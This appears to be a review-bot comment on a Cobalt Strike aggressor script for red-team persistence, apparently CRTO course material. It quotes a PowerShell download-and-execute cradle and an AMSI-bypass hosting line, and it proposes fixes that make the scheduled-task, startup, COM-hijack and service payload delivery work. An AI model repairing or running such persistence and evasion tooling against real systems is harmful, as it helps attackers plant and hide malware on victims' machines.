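Review bot: `$url_amsi`, interpolated into the PowerShell cradle in both the Task Scheduler (CRTO.cna:78) and Startup Folder (CRTO.cna:122) items, is never assigned anywhere in this file — only `$ip` is declared global and no `site_host` call produces it — so the encoded command becomes `IEX ((new-object net.webclient).downloadstring(""))` and the persistence one-liner throws before the real stager is ever fetched; either host the bypass and set `$url_amsi = site_host($ip, 80, "/amsi", $amsi, "text/plain", "AMSI bypass");` next to `$url`, or drop the first IEX. Two copy-paste slips in the same section look unintended: the COM Hijacks item (CRTO.cna:196) registers `C:\Windows\Temp\http_arp.exe` as an HKCU Run value via SharPersist even though that item only uploads `http_com.dll`, leaving a stray autorun pointing at a file it never placed, and "Password in registry (User)" (CRTO.cna:370) queries `HKLM` instead of `HKCU`, so it duplicates the Machine item. Every `foreach $name (listeners_local())` loop also keeps whichever matching listener iterates last and never checks that one matched at all, so with no http/tcp-local/dns listener the item silently writes an empty payload to `Payloads/`, uploads it and registers it on the target; a `if ($data is $null) { print_error("no matching listener"); return; }` after each loop would stop that, and the "Svc DNS" item should use its own filename and service name rather than reusing `tcp_svc.exe` / `legit-svc` from the TCP item.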